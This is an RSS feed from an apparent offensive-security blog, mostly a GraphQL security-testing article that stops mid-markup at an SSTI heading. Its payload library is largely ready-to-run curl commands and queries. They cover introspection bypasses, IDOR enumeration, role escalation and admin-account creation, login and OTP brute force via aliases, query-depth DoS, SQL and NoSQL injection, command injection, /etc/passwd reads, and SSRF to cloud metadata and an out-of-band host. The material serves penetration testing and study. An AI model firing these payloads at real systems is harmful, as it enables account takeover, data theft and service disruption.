API Security on MrAzoth https://az0th.it/web/api/ Recent content in API Security on MrAzoth Hugo -- 0.154.5 en-us Tue, 24 Feb 2026 00:00:00 +0000 API Key Leakage https://az0th.it/web/api/114-api-key-leakage/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/api/114-api-key-leakage/ <h1 id="api-key-leakage">API Key Leakage</h1> <blockquote> <p><strong>Severity</strong>: High–Critical | <strong>CWE</strong>: CWE-312, CWE-200, CWE-522 <strong>OWASP</strong>: A02:2021 – Cryptographic Failures | A09:2021 – Security Logging Failures</p> </blockquote> <hr> <h2 id="what-is-api-key-leakage">What Is API Key Leakage?</h2> <p>API keys, tokens, secrets, and credentials exposed through unintended channels — JavaScript bundles, git history, HTTP responses, mobile app binaries, environment variables in public CI logs, and configuration files. Unlike authentication token theft, API key leakage is passive: the credential is simply read from a public source.</p> GraphQL Security Testing https://az0th.it/web/api/111-api-graphql-full/ Tue, 24 Feb 2026 00:00:00 +0000 https://az0th.it/web/api/111-api-graphql-full/ <h1 id="graphql-security-testing">GraphQL Security Testing</h1> <blockquote> <p><strong>Severity</strong>: High–Critical | <strong>CWE</strong>: CWE-284, CWE-200, CWE-400 <strong>OWASP</strong>: A01:2021 – Broken Access Control | A05:2021 – Security Misconfiguration</p> </blockquote> <hr> <h2 id="what-is-graphql">What Is GraphQL?</h2> <p>GraphQL is a query language for APIs where clients specify exactly what data they need. Unlike REST, GraphQL exposes a <strong>single endpoint</strong> (<code>/graphql</code>, <code>/api/graphql</code>) and allows flexible queries, mutations, and subscriptions. Security issues arise from introspection, missing authorization, batching abuse, and complex query DoS.</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-graphql" data-lang="graphql"><span style="display:flex;"><span><span style="color:#75715e"># Query (read):</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">query</span> { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">user</span>(id: <span style="color:#a6e22e">1</span>) { name email role } </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Mutation (write):</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">mutation</span> { </span></span><span style="display:flex;"><span> <span style="color:#a6e22e">createUser</span>(<span style="color:#66d9ef">input</span>: {<span style="color:#a6e22e">name</span>: <span style="color:#e6db74">&#34;attacker&#34;</span>, <span style="color:#a6e22e">role</span>: <span style="color:#e6db74">&#34;admin&#34;</span>}) { <span style="color:#a6e22e">id</span> } </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Subscription (real-time):</span> </span></span><span style="display:flex;"><span><span style="color:#a6e22e">subscription</span> { </span></span><span style="display:flex;"><span> newMessage { content sender } </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><hr> <h2 id="discovery-checklist">Discovery Checklist</h2> <ul> <li><input disabled="" type="checkbox"> Find GraphQL endpoint: <code>/graphql</code>, <code>/api/graphql</code>, <code>/gql</code>, <code>/query</code>, <code>/v1/graphql</code></li> <li><input disabled="" type="checkbox"> Try <code>GET /graphql?query={__typename}</code> — quick existence check</li> <li><input disabled="" type="checkbox"> Check introspection: <code>{__schema{types{name}}}</code> — enabled in production?</li> <li><input disabled="" type="checkbox"> Map all types, queries, mutations via introspection</li> <li><input disabled="" type="checkbox"> Test missing authorization on queries (no auth required for sensitive data)</li> <li><input disabled="" type="checkbox"> Test IDOR on object IDs in queries</li> <li><input disabled="" type="checkbox"> Test mutations for privilege escalation (role field, admin flag)</li> <li><input disabled="" type="checkbox"> Test query batching — send array of queries: <code>[{query:...},{query:...}]</code></li> <li><input disabled="" type="checkbox"> Test alias-based query multiplication</li> <li><input disabled="" type="checkbox"> Test deeply nested queries for DoS (no depth/complexity limits)</li> <li><input disabled="" type="checkbox"> Test introspection bypass (disabled? → try field name guessing)</li> <li><input disabled="" type="checkbox"> Look for debug fields: <code>__debug</code>, <code>_service</code>, <code>sdl</code></li> <li><input disabled="" type="checkbox"> Test HTTP verb: many endpoints accept both GET and POST</li> <li><input disabled="" type="checkbox"> Check for <code>Content-Type: application/json</code> vs <code>multipart/form-data</code> (file upload)</li> </ul> <hr> <h2 id="payload-library">Payload Library</h2> <h3 id="payload-1--introspection-queries">Payload 1 — Introspection Queries</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-graphql" data-lang="graphql"><span style="display:flex;"><span><span style="color:#75715e"># Full schema dump:</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">query</span> <span style="color:#a6e22e">IntrospectionQuery</span> { </span></span><span style="display:flex;"><span> __schema { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">query</span><span style="color:#a6e22e">Type</span> { name } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">mutation</span><span style="color:#a6e22e">Type</span> { name } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">subscription</span><span style="color:#a6e22e">Type</span> { name } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">type</span><span style="color:#a6e22e">s</span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">...</span>FullType </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">directive</span>s { </span></span><span style="display:flex;"><span> name description locations args { <span style="color:#66d9ef">...</span>InputValue } </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">fragment</span> <span style="color:#a6e22e">FullType</span> <span style="color:#66d9ef">on</span> __Type { </span></span><span style="display:flex;"><span> kind name description </span></span><span style="display:flex;"><span> fields(includeDeprecated: <span style="color:#a6e22e">true</span>) { </span></span><span style="display:flex;"><span> name description </span></span><span style="display:flex;"><span> args { <span style="color:#66d9ef">...</span>InputValue } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">type</span> { <span style="color:#66d9ef">...</span><span style="color:#a6e22e">TypeRef</span> } </span></span><span style="display:flex;"><span> isDeprecated deprecationReason </span></span><span style="display:flex;"><span> } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">input</span><span style="color:#a6e22e">Fields</span> { <span style="color:#66d9ef">...</span>InputValue } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">interface</span><span style="color:#a6e22e">s</span> { <span style="color:#66d9ef">...</span>TypeRef } </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">enum</span><span style="color:#a6e22e">Values</span>(includeDeprecated: <span style="color:#a6e22e">true</span>) { name description isDeprecated deprecationReason } </span></span><span style="display:flex;"><span> possibleTypes { <span style="color:#66d9ef">...</span>TypeRef } </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">fragment</span> <span style="color:#a6e22e">InputValue</span> <span style="color:#66d9ef">on</span> __InputValue { </span></span><span style="display:flex;"><span> name description <span style="color:#66d9ef">type</span> { <span style="color:#66d9ef">...</span><span style="color:#a6e22e">TypeRef</span> } defaultValue </span></span><span style="display:flex;"><span>} </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">fragment</span> <span style="color:#a6e22e">TypeRef</span> <span style="color:#66d9ef">on</span> __Type { </span></span><span style="display:flex;"><span> kind name </span></span><span style="display:flex;"><span> ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } </span></span><span style="display:flex;"><span>} </span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Quick introspection via curl:</span> </span></span><span style="display:flex;"><span>curl -s -X POST https://target.com/graphql <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#39;{&#34;query&#34;:&#34;{__schema{types{name kind}}}&#34;}&#39;</span> | python3 -m json.tool </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Get all queries and mutations:</span> </span></span><span style="display:flex;"><span>curl -s -X POST https://target.com/graphql <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#39;{&#34;query&#34;:&#34;{__schema{queryType{fields{name description args{name type{name kind}}}}}}&#34;}&#39;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> | python3 -m json.tool </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># List all mutations:</span> </span></span><span style="display:flex;"><span>curl -s -X POST https://target.com/graphql <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#39;{&#34;query&#34;:&#34;{__schema{mutationType{fields{name description args{name type{name}}}}}}&#34;}&#39;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> | python3 -m json.tool </span></span></code></pre></div><h3 id="payload-2--introspection-bypass-techniques">Payload 2 — Introspection Bypass Techniques</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># If introspection is blocked → try alternate formats:</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Method suggestion (partial introspection):</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;{__type(name: \&#34;User\&#34;) {fields {name type {name}}}}&#34;</span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Typename leak:</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;{__typename}&#34;</span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Field suggestion: send invalid field → error reveals valid fields</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;{ user { invalidField } }&#34;</span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Error: &#34;Did you mean &#39;email&#39;? &#39;username&#39;? &#39;role&#39;?&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Disable introspection bypass via newlines (some implementations):</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;{\n __schema\n{\ntypes\n{\nname\n}\n}\n}&#34;</span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Via GET request (different parser path):</span> </span></span><span style="display:flex;"><span>GET /graphql?query<span style="color:#f92672">={</span>__schema<span style="color:#f92672">{</span>types<span style="color:#f92672">{</span>name<span style="color:#f92672">}}}</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Fragment-based (bypass regex filters on &#34;__schema&#34;):</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;fragment f on __Schema { types { name } } { ...f }&#34;</span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># X-Apollo-Tracing header sometimes re-enables debug:</span> </span></span><span style="display:flex;"><span>-H <span style="color:#e6db74">&#34;X-Apollo-Tracing: 1&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Playground / IDE endpoints (often unrestricted):</span> </span></span><span style="display:flex;"><span>GET /graphiql <span style="color:#75715e"># GraphiQL</span> </span></span><span style="display:flex;"><span>GET /graphql/playground <span style="color:#75715e"># Apollo Playground</span> </span></span><span style="display:flex;"><span>GET /altair <span style="color:#75715e"># Altair client</span> </span></span><span style="display:flex;"><span>GET /voyager <span style="color:#75715e"># GraphQL Voyager</span> </span></span></code></pre></div><h3 id="payload-3--authorization-testing">Payload 3 — Authorization Testing</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Query without authentication → sensitive data?</span> </span></span><span style="display:flex;"><span>curl -s -X POST https://target.com/graphql <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#39;{&#34;query&#34;:&#34;{ users { id email role password } }&#34;}&#39;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># IDOR via ID enumeration:</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">for</span> id in <span style="color:#66d9ef">$(</span>seq <span style="color:#ae81ff">1</span> 50<span style="color:#66d9ef">)</span>; <span style="color:#66d9ef">do</span> </span></span><span style="display:flex;"><span> curl -s -X POST https://target.com/graphql <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer YOUR_LOW_PRIV_TOKEN&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#34;{\&#34;query\&#34;:\&#34;{ user(id: </span>$id<span style="color:#e6db74">) { id email role privateData } }\&#34;}&#34;</span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">done</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Access another user&#39;s private data:</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;{ user(id: 1337) { email billingAddress creditCard } }&#34;</span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Try admin queries with user token:</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;{ adminPanel { users { id email isAdmin } } }&#34;</span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;{ allUsers { nodes { id email passwordHash } } }&#34;</span><span style="color:#f92672">}</span> </span></span></code></pre></div><h3 id="payload-4--mutation-privilege-escalation">Payload 4 — Mutation Privilege Escalation</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Modify own role:</span> </span></span><span style="display:flex;"><span>curl -s -X POST https://target.com/graphql <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Authorization: Bearer USER_TOKEN&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#39;{&#34;query&#34;:&#34;mutation { updateUser(id: \&#34;MY_ID\&#34;, input: {role: \&#34;admin\&#34;}) { id role } }&#34;}&#39;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Create admin user:</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;mutation { createUser(input: {email: \&#34;attacker@evil.com\&#34;, password: \&#34;pass\&#34;, role: \&#34;admin\&#34;, isAdmin: true}) { id } }&#34;</span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Password reset without token:</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;mutation { resetPassword(email: \&#34;victim@corp.com\&#34;) { success } }&#34;</span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Delete another user&#39;s data (IDOR via mutation):</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;mutation { deletePost(id: \&#34;VICTIM_POST_ID\&#34;) { success } }&#34;</span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Mass assignment in mutation — try extra fields:</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span> </span></span><span style="display:flex;"><span> <span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;mutation { updateProfile(input: {name: \&#34;test\&#34;, isAdmin: true, role: \&#34;superadmin\&#34;, verified: true, credits: 99999}) { id name role } }&#34;</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">}</span> </span></span></code></pre></div><h3 id="payload-5--batching--brute-force-via-aliases">Payload 5 — Batching / Brute Force via Aliases</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Query batching — send array of requests (bypasses rate limit per-request):</span> </span></span><span style="display:flex;"><span>curl -s -X POST https://target.com/graphql <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -H <span style="color:#e6db74">&#34;Content-Type: application/json&#34;</span> <span style="color:#ae81ff">\ </span></span></span><span style="display:flex;"><span> -d <span style="color:#e6db74">&#39;[ </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> {&#34;query&#34;: &#34;mutation { login(email:\&#34;admin@corp.com\&#34;, password:\&#34;password1\&#34;) { token } }&#34;}, </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> {&#34;query&#34;: &#34;mutation { login(email:\&#34;admin@corp.com\&#34;, password:\&#34;password2\&#34;) { token } }&#34;}, </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> {&#34;query&#34;: &#34;mutation { login(email:\&#34;admin@corp.com\&#34;, password:\&#34;password3\&#34;) { token } }&#34;} </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> ]&#39;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Alias-based batching in single request:</span> </span></span><span style="display:flex;"><span>mutation <span style="color:#f92672">{</span> </span></span><span style="display:flex;"><span> a1: login<span style="color:#f92672">(</span>email: <span style="color:#e6db74">&#34;admin@corp.com&#34;</span>, password: <span style="color:#e6db74">&#34;password1&#34;</span><span style="color:#f92672">)</span> <span style="color:#f92672">{</span> token <span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> a2: login<span style="color:#f92672">(</span>email: <span style="color:#e6db74">&#34;admin@corp.com&#34;</span>, password: <span style="color:#e6db74">&#34;password2&#34;</span><span style="color:#f92672">)</span> <span style="color:#f92672">{</span> token <span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> a3: login<span style="color:#f92672">(</span>email: <span style="color:#e6db74">&#34;admin@corp.com&#34;</span>, password: <span style="color:#e6db74">&#34;password3&#34;</span><span style="color:#f92672">)</span> <span style="color:#f92672">{</span> token <span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Alias OTP brute-force (all 10000 codes in one request):</span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Generate query:</span> </span></span><span style="display:flex;"><span>python3 -c <span style="color:#e6db74">&#34; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">queries = [] </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">for i in range(10000): </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> code = f&#39;{i:04d}&#39; </span></span></span><span style="display:flex;"><span><span style="color:#e6db74"> queries.append(f&#39;a{i}: verifyOTP(code: \&#34;{code}\&#34;) {{ valid }}&#39;) </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">print(&#39;mutation {\\n&#39; + &#39;\\n&#39;.join(queries) + &#39;\\n}&#39;) </span></span></span><span style="display:flex;"><span><span style="color:#e6db74">&#34;</span> &gt; brute_otp.graphql </span></span></code></pre></div><h3 id="payload-6--query-depth--complexity-dos">Payload 6 — Query Depth / Complexity DoS</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Deeply nested query — exponential server-side resolution:</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span> </span></span><span style="display:flex;"><span> user<span style="color:#f92672">(</span>id: 1<span style="color:#f92672">)</span> <span style="color:#f92672">{</span> </span></span><span style="display:flex;"><span> friends <span style="color:#f92672">{</span> </span></span><span style="display:flex;"><span> friends <span style="color:#f92672">{</span> </span></span><span style="display:flex;"><span> friends <span style="color:#f92672">{</span> </span></span><span style="display:flex;"><span> friends <span style="color:#f92672">{</span> </span></span><span style="display:flex;"><span> friends <span style="color:#f92672">{</span> </span></span><span style="display:flex;"><span> friends <span style="color:#f92672">{</span> </span></span><span style="display:flex;"><span> id email </span></span><span style="display:flex;"><span> <span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> <span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> <span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> <span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> <span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> <span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> <span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Circular fragment DoS:</span> </span></span><span style="display:flex;"><span>fragment f1 on User <span style="color:#f92672">{</span> friends <span style="color:#f92672">{</span> ...f2 <span style="color:#f92672">}</span> <span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span>fragment f2 on User <span style="color:#f92672">{</span> friends <span style="color:#f92672">{</span> ...f1 <span style="color:#f92672">}</span> <span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span> user<span style="color:#f92672">(</span>id: 1<span style="color:#f92672">)</span> <span style="color:#f92672">{</span> ...f1 <span style="color:#f92672">}</span> <span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Field duplication:</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span> user<span style="color:#f92672">(</span>id:1<span style="color:#f92672">)</span> <span style="color:#f92672">{</span> id id id id id id id id id id id <span style="color:#f92672">}</span> <span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Python generator for deep nesting:</span> </span></span><span style="display:flex;"><span>depth <span style="color:#f92672">=</span> <span style="color:#ae81ff">20</span> </span></span><span style="display:flex;"><span>query <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;{ user(id: 1) { &#34;</span> + <span style="color:#e6db74">&#34;friends { &#34;</span> * depth + <span style="color:#e6db74">&#34;id&#34;</span> + <span style="color:#e6db74">&#34; }&#34;</span> * depth + <span style="color:#e6db74">&#34; }&#34;</span> </span></span><span style="display:flex;"><span>print<span style="color:#f92672">(</span>query<span style="color:#f92672">)</span> </span></span></code></pre></div><h3 id="payload-7--information-disclosure">Payload 7 — Information Disclosure</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># Check for debug / tracing fields:</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;{ __typename _service { sdl } }&#34;</span><span style="color:#f92672">}</span> <span style="color:#75715e"># Apollo Federation SDL</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;{ _entities(representations: []) { __typename } }&#34;</span><span style="color:#f92672">}</span> <span style="color:#75715e"># Federation</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;{ __schema { description } }&#34;</span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Error messages revealing internals:</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;{ user(id: \&#34;&#39; OR 1=1--\&#34;) { id } }&#34;</span><span style="color:#f92672">}</span> <span style="color:#75715e"># SQLi via GraphQL</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;{ user(id: \&#34;</span><span style="color:#66d9ef">$(</span>id<span style="color:#66d9ef">)</span><span style="color:#e6db74">\&#34;) { id } }&#34;</span><span style="color:#f92672">}</span> <span style="color:#75715e"># CMDi via GraphQL</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;{ fileContent(path: \&#34;/etc/passwd\&#34;) { content } }&#34;</span><span style="color:#f92672">}</span> <span style="color:#75715e"># LFI via field</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Subscription enumeration:</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;subscription { newUser { id email password } }&#34;</span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Check for __resolveType disclosure:</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;{ node(id: \&#34;VXNlcjox\&#34;) { __typename ... on User { email role } } }&#34;</span><span style="color:#f92672">}</span> </span></span></code></pre></div><h3 id="payload-8--graphql-injection-sqlicmdi-via-resolver">Payload 8 — GraphQL Injection (SQLi/CMDi via Resolver)</h3> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e"># If resolver passes args directly to SQL:</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;{ user(name: \&#34;admin&#39; UNION SELECT password FROM users--\&#34;) { id } }&#34;</span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;{ search(query: \&#34;test&#39; OR &#39;1&#39;=&#39;1\&#34;) { results } }&#34;</span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># NoSQLi via GraphQL:</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;{ users(filter: {email: {</span>$gt<span style="color:#e6db74">: \&#34;\&#34;}}) { nodes { id email } } }&#34;</span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># SSRF via GraphQL URL field:</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;{ importProfile(url: \&#34;http://169.254.169.254/latest/meta-data/\&#34;) { data } }&#34;</span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">{</span><span style="color:#e6db74">&#34;query&#34;</span>: <span style="color:#e6db74">&#34;{ webhook(url: \&#34;http://COLLABORATOR_ID.oast.pro/test\&#34;) { status } }&#34;</span><span style="color:#f92672">}</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># SSTI via template field:</span> </span></span><span 